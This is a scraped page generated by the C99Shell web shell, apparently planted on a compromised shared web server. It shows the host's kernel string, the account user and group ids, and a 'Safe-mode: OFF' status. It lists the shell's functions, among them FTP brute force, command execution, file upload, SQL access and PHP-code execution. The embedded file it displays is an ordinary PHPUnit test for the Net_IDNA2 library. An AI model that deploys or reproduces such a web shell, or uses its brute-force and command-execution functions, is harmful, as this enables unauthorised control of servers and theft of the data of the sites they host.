!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/alt/php54/usr/share/pear/test/Net_IDNA2/tests/   drwxr-xr-x
Free 293.9 GB of 429.69 GB (68.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Net_IDNA2Test.php (2.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once 'Net/IDNA2.php';

class 
Net_IDNA2Test extends PHPUnit_Framework_TestCase
{
    
/**
     * Initialise tests
     *
     * @return void
     */
    
public function setUp()
    {
        
$this->idn = new Net_IDNA2();
    }

    
/**
     * Test if a complete URL consisting also of port-number etc. will be decoded just fine, test 1
     *
     * @return void
     */
    
public function testShouldDecodePortNumbersFragmentsAndUrisCorrectly1()
    {
        
$result $this->idn->decode('http://www.xn--ml-6kctd8d6a.org:8080/test.php?arg1=1&arg2=2#fragment');
        
$this->assertSame("http://www.\xD0\xB5\xD1\x85\xD0\xB0m\xD1\x80l\xD0\xB5.org:8080/test.php?arg1=1&arg2=2#fragment"$result);
    }

    
/**
     * Test if a complete URL consisting also of port-number etc. will be decoded just fine, test 2
     *
     * @return void
     */
    
public function testShouldDecodePortNumbersFragmentsAndUrisCorrectly2()
    {
        
$result $this->idn->decode('http://xn--tst-qla.example.com:8080/test.php?arg1=1&arg2=2#fragment');
        
$this->assertSame("http://täst.example.com:8080/test.php?arg1=1&arg2=2#fragment"$result);
    }

    
/**
     * Test encoding of German letter Eszett according to the original standard (IDNA2003)
     *
     * @return void
     */
    
public function testEncodingForGermanEszettUsingIDNA2003()
    {
        
// make sure to use 2003-encoding
        
$this->idn->setParams('version''2003');
        
$result $this->idn->encode('http://www.straße.example.com/');

        
$this->assertSame("http://www.strasse.example.com/"$result);
    }

    
/**
     * Test encoding of German letter Eszett according to the "new" standard (IDNA2005/IDNAbis)
     *
     * @return void
     */
    
public function testEncodingForGermanEszettUsingIDNA2008()
    {
        
// make sure to use 2008-encoding
        
$this->idn->setParams('version''2008');
        
$result $this->idn->encode('http://www.straße.example.com/');
        
// switch back for other testcases
        
$this->idn->setParams('version''2003');

        
$this->assertSame("http://www.xn--strae-oqa.example.com/"$result);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0971 ]--